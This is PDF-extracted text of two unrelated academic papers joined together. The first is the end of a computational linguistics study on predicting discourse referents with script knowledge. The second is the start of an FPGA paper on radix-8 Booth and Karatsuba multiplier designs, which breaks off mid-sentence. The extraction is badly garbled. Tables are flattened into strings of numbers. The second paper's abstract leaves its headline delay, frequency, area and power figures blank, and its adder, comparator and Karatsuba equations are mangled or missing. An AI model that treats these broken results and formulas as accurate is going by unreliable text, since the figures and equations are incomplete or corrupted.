Perplexity Accuracy Perplexity Grocery Shopping 74.80 2.13 68.17 3.16 53.85 6.54 32.89 24.48 Repairing a flat bicycle tyre 78.34 2.72 62.09 3.89 51.26 6.38 29.24 19.08 Riding a public bus 72.19 2.28 64.57 3.67 52.65 6.34 32.78 23.39 Getting a haircut 71.06 2.45 58.82 3.79 42.82 7.11 28.70 15.40 Planting a tree 71.86 2.46 59.32 4.25 47.80 7.31 28.14 24.28 Borrowing book from library 77.49 1.93 64.07 3.55 43.29 8.40 33.33 20.26 Taking Bath 81.29 1.84 67.42 3.14 61.29 4.33 43.23 16.33 Going on a train 70.79 2.39 58.73 4.20 47.62 7.68 30.16 35.11 Baking a cake 76.43 2.16 61.79 5.11 46.40 9.16 24.07 23.67 Flying in an airplane 62.04 3.08 61.31 4.01 48.18 7.27 30.90 30.18 Average 73.63 2.34 62.63 3.88 49.52 7.05 31.34 23.22 Table 3: Accuracies (in %) and perplexities for different models and scenarios. The script model substantially out- performs linguistic and base models (with p < 0.001, significance tested with McNemar’s test (Everitt, 1992)). As expected, the human prediction model outperforms the script model (with p < 0.001, significance tested by McNe- mar’s test). Model Accuracy Perplexity Linguistic Model 49.52 7.05 Linguistic Model + Predicate Schemas 55.44 5.88 Linguistic Model + Participant type fit 58.88 4.29 Full Script Model (both features) 62.63 3.88 Table 4: Accuracies from ablation experiments. d(l,t) are the history and the correct DR for this posi- tion, respectively. The term δr(r′) is the Kronecker delta which equals 1 if r = r′ and 0, otherwise. Dr is the total number of rules for the syntactic function r in the training set: Dr = ∑ l,t δr(r(h (l,t)))×|N(d(l,t),h(l,t))|. Let us illustrate the computation with an example. Imagine that our training set consists of the docu- ment in Figure 1, and the trained model is used to predict the upcoming DR in our referent cloze exam- ple (Figure 4). The training document includes the pair X-object-of-scrubbed → X-object-of-rinsing, so the corresponding term (xscrubbed - xrinsing) partici- pates in the summation (3) for αobj. As we rely on external embeddings, which encode semantic simi- larities between lexical items, the dot product of this term and (xrubbed - xrinsed) will be high.7 Conse- quently, ϕ(d,h(t)) is expected to be positive for d = “soap”, thus, predicting “soap” as the likely forth- coming DR. Unfortunately, there are other terms (xu − xv) both in expression (3) for αobj and in expression (2) for ϕ(d,h(t)). These terms may be 7The score would have been even higher, should the pred- icate be in the morphological form rinsing rather than rinsed. However, embeddings of rinsing and rinsed would still be suf- ficiently close to each other for our argument to hold. irrelevant to the current prediction, as X-object-of- plugged → X-object-of-filling from Figure 1, and may not even encode any valid regularities, as X- object-of-got → X-object-of-scrubbed (again from Figure 1). This may suggest that our feature will be too contaminated with noise to be informative for making predictions. However, recall that inde- pendent random vectors in high dimensions are al- most orthogonal, and, assuming they are bounded, their dot products are close to zero. Consequently, the products of the relevant (“non-random”) terms, in our example (xscrubbed - xrinsing) and (xrubbed - xrinsed), are likely to overcome the (“random”) noise. As we will see in the ablation studies, the predicate- schema feature is indeed predictive of a DR and con- tributes to the performance of the full model. 4.3 Experiments We would like to test whether our model can pro- duce accurate predictions and whether the model’s guesses correlate well with human predictions for the referent cloze task. In order to be able to evaluate the effect of script knowledge on referent predictability, we compare three models: our full Script model uses all of the features introduced in section 4.2; the Linguistic model relies only on the ‘linguistic features’ but not the script-specific ones; and the Base model includes all the shallow linguistic features. The Base model differs from the linguistic model in that it does not model selectional preferences. Table 2 summarizes features used in different models. The data set was randomly divided into training (70%), development (10%, 91 stories from 10 sce- 39 narios), and test (20%, 182 stories from 10 scenar- ios) sets. The feature weights were learned using L-BFGS (Byrd et al., 1995) to optimize the log- likelihood. Evaluation against original referents. We calcu- lated the percentage of correct DR predictions. See Table 3 for the averages across 10 scenarios. We can see that the task appears hard for humans: their average performance reaches only 73% accuracy. As expected, the Base model is the weakest system (the accuracy of 31%). Modeling selectional pref- erences yields an extra 18% in accuracy (Linguis- tic model). The key finding is that incorporation of script knowledge increases the accuracy by further 13%, although still far behind human performance (62% vs. 73%). Besides accuracy, we use perplex- ity, which we computed not only for all our models but also for human predictions. This was possible as each task was solved by multiple humans. We used unsmoothed normalized guess frequencies as the probabilities. As we can see from Table 3, the perplexity scores are consistent with the accuracies: the script model again outperforms other methods, and, as expected, all the models are weaker than hu- mans. As we used two sets of script features, capturing different aspects of script knowledge, we performed extra ablation studies (Table 4). The experiments confirm that both feature sets were beneficial. Evaluation against human expectations. In the previous subsection, we demonstrated that the in- corporation of selectional preferences and, perhaps more interestingly, the integration of automatically acquired script knowledge lead to improved accu- racy in predicting discourse referents. Now we turn to another question raised in the introduction: does incorporation of this knowledge make our predic- tions more human-like? In other words, are we able to accurately estimate human expectations? This in- cludes not only being sufficiently accurate but also making the same kind of incorrect predictions. In this evaluation, we therefore use human guesses collected during the referent cloze task as our target. We then calculate the relative accuracy of each computational model. As can be seen in Figure 5, the Script model, at approx. 53% accuracy, is a lot more accurate in predicting human guesses than the Linguistic model and the Base model. We can also Script Linguistic Base 0 1 0 2 0 3 0 4 0 5 0 6 0 52.9 38.4 34.52 R e l. A cc u ra cy ( in % ) Figure 5: Average relative accuracies of different models w.r.t human predictions. Script Linguistic Base0 .0 0 .2 0 .4 0 .6 0 .8 0.5 0.57 0.66 JS D iv e rg e n ce Figure 6: Average Jensen-Shannon divergence between human predictions and models. observe that the margin between the Script model and the Linguistic model is a lot larger in this evalu- ation than between the Base model and the Linguis- tic model. This indicates that the model which has access to script knowledge is much more similar to human prediction behavior in terms of top guesses than the script-agnostic models. Now we would like to assess if our predictions are similar as distributions rather than only yield- ing similar top predictions. In order to compare the distributions, we use the Jensen-Shannon divergence (JSD), a symmetrized version of the Kullback- Leibler divergence. Intuitively, JSD measures the distance between two probability distributions. A smaller JSD value is indicative of more similar distributions. Fig- ure 6 shows that the probability distributions result- ing from the Script model are more similar to human predictions than those of the Linguistic and Base models. In these experiments, we have shown that script knowledge improves predictions of upcoming ref- erents and that the script model is the best among our models in approximating human referent predic- tions. 5 Referring Expression Type Prediction Model (RE Model) Using the referent prediction models, we next at- tempt to replicate Tily and Piantadosi’s findings that 40 the choice of the type of referring expression (pro- noun or full NP) depends in part on the predictability of the referent. 5.1 Uniform Information Density hypothesis The uniform information density (UID) hypothe- sis suggests that speakers tend to convey information at a uniform rate (Jaeger, 2010). Applied to choice of referring expression type, it would predict that a highly predictable referent should be encoded us- ing a short code (here: a pronoun), while an unpre- dictable referent should be encoded using a longer form (here: a full NP). Information density is mea- sured using the information-theoretic measure of the surprisal S of a message mi: S(mi) = − log P(mi | context) UID has been very successful in explaining a vari- ety of linguistic phenomena; see Jaeger et al. (2016). There is, however, controversy about whether UID affects pronominalization. Tily and Piantadosi (2009) report evidence that writers are more likely to refer using a pronoun or proper name when the ref- erent is easy to guess and use a full NP when readers have less certainty about the upcoming referent; see also Arnold (2001). But other experiments (using highly controlled stimuli) have failed to find an ef- fect of predictability on pronominalization (Steven- son et al., 1994; Fukumura and van Gompel, 2010; Rohde and Kehler, 2014). The present study hence contributes to the debate on whether UID affects re- ferring expression choice. 5.2 A model of Referring Expression Choice Our goal is to determine whether referent pre- dictability (quantified in terms of surprisal) is cor- related with the type of referring expression used in the text. Here we focus on the distinction be- tween pronouns and full noun phrases. Our data also contains a small percentage (ca. 1%) of proper names (like “John”). Due to this small class size and earlier findings that proper nouns behave much like pronouns (Tily and Piantadosi, 2009), we com- bined pronouns and proper names into a single class of short encodings. For the referring expression type prediction task, we estimate the surprisal of the referent from each of our computational models from Section 4 as well as the human cloze task. The surprisal of an upcoming discourse referent d(t) based on the previous context h(t) is thereby estimated as: S(d(t)) = − log p(d(t) | h(t)) In order to determine whether referent predictability has an effect on referring expression type over and above other factors that are known to affect the choice of referring expression, we train a logistic regression model with referring expression type as a response variable and discourse referent predictabil- ity as well as a large set of other linguistic factors (based on Tily and Piantadosi, 2009) as explanatory variables. The model is defined as follows: p(n(t) = n|d(t),h(t)) = exp(v T g(n,dt,h(t)))∑ n′ exp(v T g(n′,dt,h(t))) , where d(t) and h(t) are defined as before, g is the feature function, and v is the vector of model pa- rameters. The summation in the denominator is over NP types (full NP vs. pronoun/proper noun). 5.3 RE Model Experiments We ran four different logistic regression models. These models all contained exactly the same set of linguistic predictors but differed in the estimates used for referent type surprisal and residual entropy. One logistic regression model used surprisal esti- mates based on the human referent cloze task, while the three other models used estimates based on the three computational models (Base, Linguistic and Script). For our experiment, we are interested in the choice of referring expression type for those occur- rences of references, where a “real choice” is possi- ble. We therefore exclude for our analysis reported below all first mentions as well as all first and second person pronouns (because there is no optionality in how to refer to first or second person). This subset contains 1345 data points. 5.4 Results The results of all four logistic regression models are shown in Table 5. We first take a look at the results for the linguistic features. While there is a bit of variability in terms of the exact coefficient es- timates between the models (this is simply due to small correlations between these predictors and the predictors for surprisal), the effect of all of these features is largely consistent across models. For in- stance, the positive coefficients for the recency fea- ture means that when a previous mention happened 41 Estimate Std. Error Pr(>| z |) Human Script Linguistic Base Human Script Linguistic Base Human Script Linguistic Base (Intercept) -3.4 -3.418 -3.245 -3.061 0.244 0.279 0.321 0.791 <2e-16 *** <2e-16 *** <2e-16 *** 0.00011 *** recency 1.322 1.322 1.324 1.322 0.095 0.095 0.096 0.097 <2e-16 *** <2e-16 *** <2e-16 *** <2e-16 *** frequency 0.097 0.103 0.112 0.114 0.098 0.097 0.098 0.102 0.317 0.289 0.251 0.262 pastObj 0.407 0.396 0.423 0.395 0.293 0.294 0.295 0.3 0.165 0.178 0.151 0.189 pastSubj -0.967 -0.973 -0.909 -0.926 0.559 0.564 0.562 0.565 0.0838 . 0.0846 . 0.106 0.101 pastExpPronoun 1.603 1.619 1.616 1.602 0.21 0.207 0.208 0.245 2.19e-14 *** 5.48e-15 *** 7.59e-15 *** 6.11e-11 *** depTypeSubj 2.939 2.942 2.656 2.417 0.299 0.347 0.429 1.113 <2e-16 *** <2e-16 *** 5.68e-10 *** 0.02994 * depTypeObj 1.199 1.227 0.977 0.705 0.248 0.306 0.389 1.109 1.35e-06 *** 6.05e-05 *** 0.0119 * 0.525 surprisal -0.04 -0.006 0.002 -0.131 0.099 0.097 0.117 0.387 0.684 0.951 0.988 0.735 residualEntropy -0.009 0.023 -0.141 -0.128 0.088 0.128 0.168 0.258 0.916 0.859 0.401 0.619 Table 5: Coefficients obtained from regression analysis for different models. Two NP types considered: full NP and Pronoun/ProperNoun, with base class full NP. Significance: ‘***’ < 0.001, ‘**’ < 0.01, ‘*’ < 0.05, and ‘.’ < 0.1. very recently, the referring expression is more likely to be a pronoun (and not a full NP). The coefficients for the surprisal estimates of the different models are, however, not significantly dif- ferent from zero. Model comparison shows that they do not improve model fit. We also used the esti- mated models to predict referring expression type on new data and again found that surprisal estimates from the models did not improve prediction accu- racy. This effect even holds for our human cloze data. Hence, it cannot be interpreted as a problem with the models—even human predictability esti- mates are, for this dataset, not predictive of referring expression type. We also calculated regression models for the full dataset including first and second person pronouns as well as first mentions (3346 data points). The re- sults for the full dataset are fully consistent with the findings shown in Table 5: there was no significant effect of surprisal on referring expression type. This result contrasts with the findings by Tily and Piantadosi (2009), who reported a significant effect of surprisal on RE type for their data. In order to replicate their settings as closely as possible, we also included residualEntropy as a predictor in our model (see last predictor in Table 5); however, this did not change the results. 6 Discussion and Future Work Our study on incrementally predicting discourse referents showed that script knowledge is a highly important factor in determining human discourse ex- pectations. Crucially, the computational modelling approach allowed us to tease apart the different fac- tors that affect human prediction as we cannot ma- nipulate this in humans directly (by asking them to “switch off” their common-sense knowledge). By modelling common-sense knowledge in terms of event sequences and event participants, our model captures many more long-range dependencies than normal language models. The script knowledge is automatically induced by our model from crowd- sourced scenario-specific text collections. In a second study, we set out to test the hypoth- esis that uniform information density affects refer- ring expression type. This question is highly con- troversial in the literature: while Tily and Piantadosi (2009) find a significant effect of surprisal on refer- ring expression type in a corpus study very similar to ours, other studies that use a more tightly con- trolled experimental approach have not found an ef- fect of predictability on RE type (Stevenson et al., 1994; Fukumura and van Gompel, 2010; Rohde and Kehler, 2014). The present study, while replicating exactly the setting of T&P in terms of features and analysis, did not find support for a UID effect on RE type. The difference in results between T&P 2009 and our results could be due to the different corpora and text sorts that were used; specifically, we would expect that larger predictability effects might be ob- servable at script boundaries, rather than within a script, as is the case in our stories. A next step in moving our participant predic- tion model towards NLP applications would be to replicate our modelling results on automatic text- to-script mapping instead of gold-standard data as done here (in order to approximate human level of processing). Furthermore, we aim to move to more complex text types that include reference to several scripts. We plan to consider the recently published ROC Stories corpus (Mostafazadeh et al., 2016), a large crowdsourced collection of topically unre- stricted short and simple narratives, as a basis for these next steps in our research. 42 Acknowledgments We thank the editors and the anonymous review- ers for their insightful suggestions. We would like to thank Florian Pusse for helping with the Ama- zon Mechanical Turk experiment. We would also like to thank Simon Ostermann and Tatjana Anikina for helping with the InScript corpus. This research was partially supported by the German Research Foundation (DFG) as part of SFB 1102 ‘Informa- tion Density and Linguistic Encoding’, European Research Council (ERC) as part of ERC Starting Grant BroadSem (#678254), the Dutch National Sci- ence Foundation as part of NWO VIDI 639.022.518, and the DFG once again as part of the MMCI Cluster of Excellence (EXC 284). References Simon Ahrendt and Vera Demberg. 2016. Improving event prediction by representing script participants. In Proceedings of NAACL-HLT. Jennifer E. Arnold. 2001. The effect of thematic roles on pronoun use and frequency of reference continuation. Discourse Processes, 31(2):137–162. Marco Baroni and Alessandro Lenci. 2010. Distribu- tional memory: A general framework for corpus-based semantics. Computational Linguistics, 36(4):673– 721. Marco Baroni, Georgiana Dinu, and Germán Kruszewski. 2014. Don’t count, predict! A systematic compari- son of context-counting vs. context-predicting seman- tic vectors. In Proceedings of ACL. Antoine Bordes, Nicolas Usunier, Alberto Garcia-Duran, Jason Weston, and Oksana Yakhnenko. 2013. Trans- lating embeddings for modeling multi-relational data. In Proceedings of NIPS. Jan A. Botha and Phil Blunsom. 2014. Compositional morphology for word representations and language modelling. In Proceedings of ICML. Richard H. Byrd, Peihuang Lu, Jorge Nocedal, and Ciyou Zhu. 1995. A limited memory algorithm for bound constrained optimization. SIAM Journal on Scientific Computing, 16(5):1190–1208. Nathanael Chambers and Daniel Jurafsky. 2008. Unsu- pervised learning of narrative event chains. In Pro- ceedings of ACL. Nathanael Chambers and Dan Jurafsky. 2009. Unsuper- vised learning of narrative schemas and their partici- pants. In Proceedings of ACL. Brian S. Everitt. 1992. The analysis of contingency ta- bles. CRC Press. Lea Frermann, Ivan Titov, and Manfred Pinkal. 2014. A hierarchical Bayesian model for unsupervised induc- tion of script knowledge. In Proceedings of EACL. Kumiko Fukumura and Roger P. G. van Gompel. 2010. Choosing anaphoric expressions: Do people take into account likelihood of reference? Journal of Memory and Language, 62(1):52–66. T. Florian Jaeger, Esteban Buz, Eva M. Fernandez, and Helen S. Cairns. 2016. Signal reduction and linguis- tic encoding. Handbook of psycholinguistics. Wiley- Blackwell. T. Florian Jaeger. 2010. Redundancy and reduction: Speakers manage syntactic information density. Cog- nitive psychology, 61(1):23–62. Bram Jans, Steven Bethard, Ivan Vulić, and Marie Francine Moens. 2012. Skip n-grams and ranking functions for predicting script events. In Proceedings of EACL. Gina R. Kuperberg and T. Florian Jaeger. 2016. What do we mean by prediction in language comprehension? Language, cognition and neuroscience, 31(1):32–59. Gina R. Kuperberg. 2016. Separate streams or proba- bilistic inference? What the N400 can tell us about the comprehension of events. Language, Cognition and Neuroscience, 31(5):602–616. Marta Kutas, Katherine A. DeLong, and Nathaniel J. Smith. 2011. A look around at what lies ahead: Pre- diction and predictability in language processing. Pre- dictions in the brain: Using our past to generate a fu- ture. Tomas Mikolov, Martin Karafiát, Lukas Burget, Jan Cer- nockỳ, and Sanjeev Khudanpur. 2010. Recurrent neu- ral network based language model. In Proceedings of Interspeech. Tomas Mikolov, Stefan Kombrink, Anoop Deoras, Lukar Burget, and Jan Cernocky. 2011. RNNLM-recurrent neural network language modeling toolkit. In Pro- ceedings of the 2011 ASRU Workshop. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013. Distributed representations of words and phrases and their compositionality. In Proceedings of NIPS. Ashutosh Modi and Ivan Titov. 2014. Inducing neural models of script knowledge. Proceedings of CoNLL. Ashutosh Modi, Tatjana Anikina, Simon Ostermann, and Manfred Pinkal. 2016. Inscript: Narrative texts anno- tated with script information. Proceedings of LREC. Ashutosh Modi. 2016. Event embeddings for semantic script modeling. Proceedings of CoNLL. Nasrin Mostafazadeh, Nathanael Chambers, Xiaodong He, Devi Parikh, Dhruv Batra, Lucy Vanderwende, Pushmeet Kohli, and James Allen. 2016. A corpus and cloze evaluation for deeper understanding of com- monsense stories. Proceedings of NAACL. 43 Haoruo Peng, Daniel Khashabi, and Dan Roth. 2015. Solving hard coreference problems. In Proceedings of NAACL. Karl Pichotta and Raymond J Mooney. 2014. Statistical script learning with multi-argument events. Proceed- ings of EACL. Altaf Rahman and Vincent Ng. 2012. Resolving com- plex cases of definite pronouns: the Winograd schema challenge. In Proceedings of EMNLP. Michaela Regneri, Alexander Koller, and Manfred Pinkal. 2010. Learning script knowledge with web experiments. In Proceedings of ACL. Hannah Rohde and Andrew Kehler. 2014. Grammati- cal and information-structural influences on pronoun production. Language, Cognition and Neuroscience, 29(8):912–927. Rachel Rudinger, Vera Demberg, Ashutosh Modi, Ben- jamin Van Durme, and Manfred Pinkal. 2015. Learn- ing to predict script events from domain-specific text. Proceedings of the International Conference on Lexi- cal and Computational Semantics (*SEM 2015). Asad Sayeed, Clayton Greenberg, and Vera Demberg. 2016. Thematic fit evaluation: an aspect of selectional preferences. In Proceedings of the Workshop on Eval- uating Vector Space Representations for NLP (RepE- val2016). Roger C. Schank and Robert P. Abelson. 1977. Scripts, Plans, Goals, and Understanding. Lawrence Erlbaum Associates, Potomac, Maryland. Simone Schütz-Bosbach and Wolfgang Prinz. 2007. Prospective coding in event representation. Cognitive processing, 8(2):93–102. Rosemary J. Stevenson, Rosalind A. Crawley, and David Kleinman. 1994. Thematic roles, focus and the rep- resentation of events. Language and Cognitive Pro- cesses, 9(4):519–548. Harry Tily and Steven Piantadosi. 2009. Refer effi- ciently: Use less informative expressions for more pre- dictable meanings. In Proceedings of the workshop on the production of referring expressions: Bridging the gap between computational and empirical approaches to reference. Alessandra Zarcone, Marten van Schijndel, Jorrig Vo- gels, and Vera Demberg. 2016. Salience and atten- tion in surprisal-based accounts of language process- ing. Frontiers in Psychology, 7:844. 44 work_2edq4sbs6readbovfgzcxl5ojy ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 15 Radix-8 Design Alternatives of Fast Two Operands Interleaved Multiplication with Enhanced Architecture With FPGA implementation & synthesize of 64-bit Wallace Tree CSA based Radix-8 Booth Multiplier Mohammad M. Asad King Faisal University, Department of Electrical Engineering, Ahsa 31982, Saudi Arabia e-mail: asadmosab@gmail.com Ibrahim Marouf King Faisal University, Department of Electrical Engineering, Ahsa 31982, Saudi Arabia e-mail: i.marouf@outlook.com Qasem Abu Al-Haija Department of Computer Information and Systems Engineering Tennessee State University, Nashville, USA e-mail: qabualha@my.tnstate.edu Abstract—In this paper, we proposed different comparable reconfigurable hardware implementations for the radix-8 fast two operands multiplier coprocessor using Karatsuba method and Booth recording method by employing carry save (CSA) and kogge stone adders (KSA) on Wallace tree organization. The proposed designs utilized family with target chip device along with simulation package. Also, the proposed designs were synthesized and benchmarked in terms of the maximum operational frequency, the total path delay, the total design area and the total thermal power dissipation. The experimental results revealed that the best multiplication architecture was belonging to Wallace Tree CSA based Radix- 8 Booth multiplier ( ) which recorded: critical path delay of , maximum operational frequency of , hardware design area (number of logic elements) of , and total thermal power dissipation estimated as . Consequently, method can be efficiently employed to enhance the speed of computation for many multiplication based applications such embedded system designs for public key cryptography. Keywords-Cryptography; Computer Arithmetic; FPGA Design; Hardware Synthesis; Kogge-Stone Adder (KSA); Radix- 8 Booth Recording; Karatsuba Multiplier; Wallace Tree I. INTRODUCTION Recently, the vast promotion in the field of information and communication technology (ICT) such as grid and fog computing has increased the inclination of having secret data sharing over the existing non- secure communication networks. This encouraged the researches to propose different solutions to ensure the safe access and store of private and sensitive data by employing different cryptographic algorithms especially the public key algorithms [1] which proved robust security resistance against most of the attacks and security halls. Public key cryptography is significantly based on the use of number theory and digital arithmetic algorithms. Indeed, wide range of public key cryptographic systems were developed and embedded using hardware modules due to its better performance and security. This increased the demand on the embedded and System-on Chip ( ) [2] technologies employing several computers aided ( ) tools along with the configurable hardware processing units such as field programmable gate array ( ) and application specific integrated circuits ( ). Therefore, considerable number of embedded coprocessors design were used to replace software based (i.e. programming based) solutions of different applications such as image processors, cryptographic processors, digital filters, low power application such as [3] and others. The major part of designing such processors significantly encompasses the use computer arithmetic techniques in the underlying layers of processing. Computer arithmetic [4] or digital arithmetic is the science that combines mathematics with computer engineering and deals with representing integers and real values in digital systems and efficient algorithms DOI: 10.21307/ijanmc-2019-043 mailto:asadmosab@gmail.com mailto:i.marouf@outlook.com mailto:qabualha@my.tnstate.edu International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 16 for manipulating such numbers by means hardware circuitry and software routines. Arithmetic operations on pairs of numbers x and y include addition ( y), subtraction ( – ), multiplication ( ), and division ( ). Subtraction and division can be viewed as operations that undo the effects of addition and multiplication, respectively. Multiplication operation is considered as a core operation that affect the performance of any embedded system. Therefore, the use of fast multiplier units will result in enhancements in the overall performance of the system. Recently, several solutions were proposed for multiplication algorithms while few of them were efficient [5]. A multiplication algorithm [6] is method to find the product of two numbers, i.e. . Multiplication is an essential building block for several digital processors as it requires a considerable amount of processing time and hardware resources. Depending on the size of the numbers, different algorithms are in use. Elementary-school grade algorithm was multiplying each number digit by digit producing partial sum with complexity of ). [5]For larger numbers, more efficient algorithms are needed. For example, let integers to be multiplied with equal to 1k bits, thus multiplications. However, more efficient and practical multiplication algorithms will be discussed in the following subsections. In this paper, we report on several fast alternative designs for Radix-8 based multiplier unit including: Radix-8 CSA Based Booth Multiplier, CSA Based Radix-8 Booth, Wallace Tree Karatsuba Multiplier, CSA Based Radix-8 Booth, KSA Based Karatsuba Multiplier, CSA Based Radix-8 Booth, With Comparator Karatsuba Multiplier, Sequential 64-Bit CSA Based Radix-8 Booth Multiplier, 64-bit Wallace Tree CSA based Radix-8 Booth multiplier (WCBM). The remaining of this paper is organized as follows: Section 2m discusses the core components of efficient multiplier design. Section 3,provides the proposed design alternatives of Radix-8 based multiplier, Section 4, presents the synthesizing results and analysis, and, finally, Section 5 concludes the paper. II. CORE DESIGN COMPONENTS-REVIEW Two operands-multiplication is a substantial arithmetic operation since it plays a major role in the design of many embedded and digital signal processors [7]. Therefore, the efficient design and implementation of a fast multiplier unit is on demand. In this paper, we propose a competitive reconfigurable multiplier design using scalable and efficient modules. Thus, the following subsections reviews the core design components for the proposed multiplier implementation unit. Figure 1. Carry save Adder: (a) Top View Design (b) Internal Architecture A. Carry save Adder (CSA) CSA [4] is a fast-redundant adder with constant carry path delay regardless of the number of operands’ bits. It produces the result as two-dimensional vectors: sum vector (or the partial sum) and carry vector (or partial carry). The advantage of CSA is that the speed is constant regardless the number of bits. However, its area increases linearly with the number of bits. The top view of the CSA unit along with its internal logic design architecture are provided in Fig.1 below. In this work, we have implemented the CSA adder using VHDL code for different bit sizes ranges from 8- bits through 64-bits [8]. The synthesize results of total delay in ( ) and area in Logic Elements (LEs) were analyzed and reported in [8] and they are illustrated in Fig.2. These results were generated using software [9], simulated for model [10] and they highly conform theoretical evaluation of CSA operation since the delay time is almost equal for all bits. However, the area is almost double for each number of bits. Also, the timing estimation of CSA was generated via Time Analyzer tool provided in the package. Accordingly, the critical path delay is which is data arrival time while the data delay is only 2.866 ns which provide a frequency of .Finally, to verify the performance of CSA, we have compared it with the well-known Carry LockAhead Adder (CLA) in terms of area and delay. CLA is a carry propagation International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 17 adder (CPA) with logarithmic relation between the carry propagation delay and the number of bits in operands. Figure 2. Delay-Area analysis of CSA vs CLA implementations (8–64 bit) The simulation results of both CSA and CLA is provided in Fig.2 shows that CSA is superior in both Area and speed. It has almost a constant time delay and relatively less area than CLA. Whereas CLA time delay increases as the number of bit increases but not much as the area size. B. Kogge-Stone Adder (KSA) KSA is a fast two operands parallel prefix adder (PPAs) [11] that executes addition on parallelized manner. PPAs are just like CLA but with an enhancement in the carry propagation stage (called the middle stage). There are five different variations of PPAs namely: Ladner-Fischer Adder (LFA), Brent- Kung Adder (BKA), Kogge-Stone Adder (KSA), Hans-Carlson Adder (HCA), and Sklansky Adder (SkA). These adders differ by the tree structure design to optimize certain aspects such as, performance, power, area size, and fan in/out. To verify the performance of all PPAs, we have implemented them on FPGA and the experimental results [6] showed that KSA utilizes larger area size to achieve higher performance comparing among all other five PPAs. Thus, we decided to consider KSA as our basic carry propagation adder (CPA) to finalize the redundant results and to build up many other units that are in-need for conventional adder. In short, the simulation results of [6] showed that KSA leading the other adders as it has the smallest time delay with only 4.504. This result is very useful and conforms the theatrical modeling of KSA which has the least number of logic levels. Like all PPAs, KSA functionality consists of three computational stages as illustrated in Fig.3, as follows:  Pre-processing stage: The computation of generate and propagate of each bit from A and B are done in this step. These signals are given by the logic equations: and  Carry generation network: PPA differentiates from each other by the connections of the network. It computes carries of each bit by using generate and propagate signals from previous block. In this block two blocks are defined group generation and propagation (GGP), in addition to group generation only (GGO), as shown in Fig.3. Logic blocks used for the calculation of generate and propagate bits can be describe by the following logic equations: and ), Where the generation group have only logic equation for carry generation: .  Post processing (Calculating the Sum):This is the last step and is common to all adders of this family (carry look ahead). It involves computation of sum bits. Sum bits are computed by the logic given in: . The top view and the internal logic circuit is provided in the Fig.3. C. Fast Multi-Operands Addition Addition operation is not commonly used to add two operands only, instead, it is more involved with multiplication and inner product computations [12]. The use of regular two operands adders leads to intermediate results before getting the last answer which affect the performance or the time delay of a system. Therefore, Multi-operand adders are manly studied to reduce this problem. Wallace and Dadda trees [13] are considered as two variations of high- performance multi-operands addition. Fig.4. shows the dot notation to represent the digit positions or International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 18 alignments (instead of using the value which is quite useful) for the use of Multi-operand addition in multiplication and inner-product computation. Figure 3. Kogge Stone Adder: (a) Top View Design of KSA (c) KSA Stages (c) Group generation and propagation In this work, we have adopted a CSA based Wallace tree since it confirmed better operands organization to improve the total addition delay [8]. We have implemented two CSA Wallace Trees: 10- operands addition and 22-operands addition. The structure logic diagram of 10 operands is given in Fig.5. It’s clearly seen that the Wallace tree unit is designed behaviorally (FSM is generated). Figure 4. Dot notation of Multi-operand addition for multiplication and inner-product computation D. Karatsuba Multiplier To enhance the performance of multiplication for large operands (i.e. 1024-bit size), a re-organization process can be adopted for the multiplication operands to utilize the maximum possible parallelism to enhance the multiplication time. Karatsuba algorithm [14] is pipelined multiplication process used mainly to construct the high precision multipliers form multiple small precision multiplier blocks by exploiting the maximum available parallelism between the multiplication blocks. The basic idea of Karatsuba algorithm is illustrated in fig.6 and Karatsuba algorithm can be defined as follows: Let be integers and is the base (Radix_2) and where n: the number of digits, then: 1) Re-write as follows: and 2) Calculate Product as follows: , where: , , , A more efficient implementation of Karatsuba multiplication can be accomplished as: Figure 5. Multi-operand addition for 10 operands. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 19 Figure 6. Aligning Partial Products. E. Magnitude Comparator The magnitude (or digital) comparator is a hardware electronic device that takes two numbers as input in binary form and determines whether one number is greater than, less than or equal to the other number. Like that in binary addition, the efficient comparator can be implemented using G (generate) and P (propagate) signal for comparison. Basically, the comparator involves two 2-bits: & can be realized by: 1 1 1 1 0 0 ( ).( ) Big B A B A B A B   (1) 1 1 0 0 EQ ( ).( )A B A B   (2) For AB, “BBig, EQ” is “0,0”. Where BBig is defined as output A less than B (A_LT_B).Comparing Eq. (1) and (2) with carry signal (3): ( ). . out in in C AB A B C G P C     (3) Where A & B are binary inputs Cin is carry input, Cout is carry output, and G & P are generate & propagate signals, respectively. Now, after comparing equations (1) & (3), we got: 1 1 1 G A B , 1 1 1 ( )EQ A B  , 0 0in C A B (4) Cin can be considered as G0. For this, encoding equation is given as: [ ] [ ] [ ]i i i G A B (5) [ ] [ ] [ ] ( ) i i i EQ A B  (6) Substituting the two values from equations (5) & (6) in (1) & (2) results in: [2 j 1:2 j] [2 j 1] [2 j 1] [2 ] . Big j B G EQ G      (7) [2 j 1:2 ] [2 j 1] [2 j] . j EQ EQ EQ    (8) & signals can be further combined to form group & signals. For instance, for 64-bit comparator, & can be computed as: 6362 [63:0] 63 0 1 . Big k m k m k B G G EQ              (9) 63 [63:0] 0 m m EQ EQ   (10) Fig 7. Shows the complete design of an 8-bit comparator as an example of this techniques where: i= 0…7, j = 0…3. III. PROPOSED MULTIPLIER DESIGN ALTERNATIVES Fundamentally, multiplication operation (along with fast addition) is a significant unit in almost all cryptographic coprocessors. For instance, in the design of SSC Crypto-processor[15], the multiplication primarily used to compute the square parameter the public key ( and the modulus ( . Also, in the design of RSA Crypto-processor, the multiplier is used to compute the modulus ( and the Euler function [16]. One more example, is the need for fast multipliers at several computation stages of ECC cryptosystem [17]. Indeed, wide range of methods have been proposed to address the efficient design of fast two operands arithmetic International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 20 multiplier. In this paper, we have spent an extensive time to design an efficient multiplier by trying several variations of different multiplier design specifications. The first design was the implementation of Radix-8 Booth Encoding Multiplier. Then, we tried many variations to employ this multiplier with different design methods. In the next subsections, we provide six design alternatives of the proposed multiplier to come up with the most cost-effective multiplier design. We finally report on the final implemented design. Figure 7. The complete design of8- Bit Comparatorincluding Pre- Encoding circuit and Comp circuit A. Radix-8 CSA Based Booth Multiplier Unlike Binary radix booth encoder, Radix-8 booth encodes each group of three bits as shown in table 1. The encoding technique uses shift operation to produce 2A and 4A while 3A is equal to 2A+A. The logic diagram of implementing CSA based 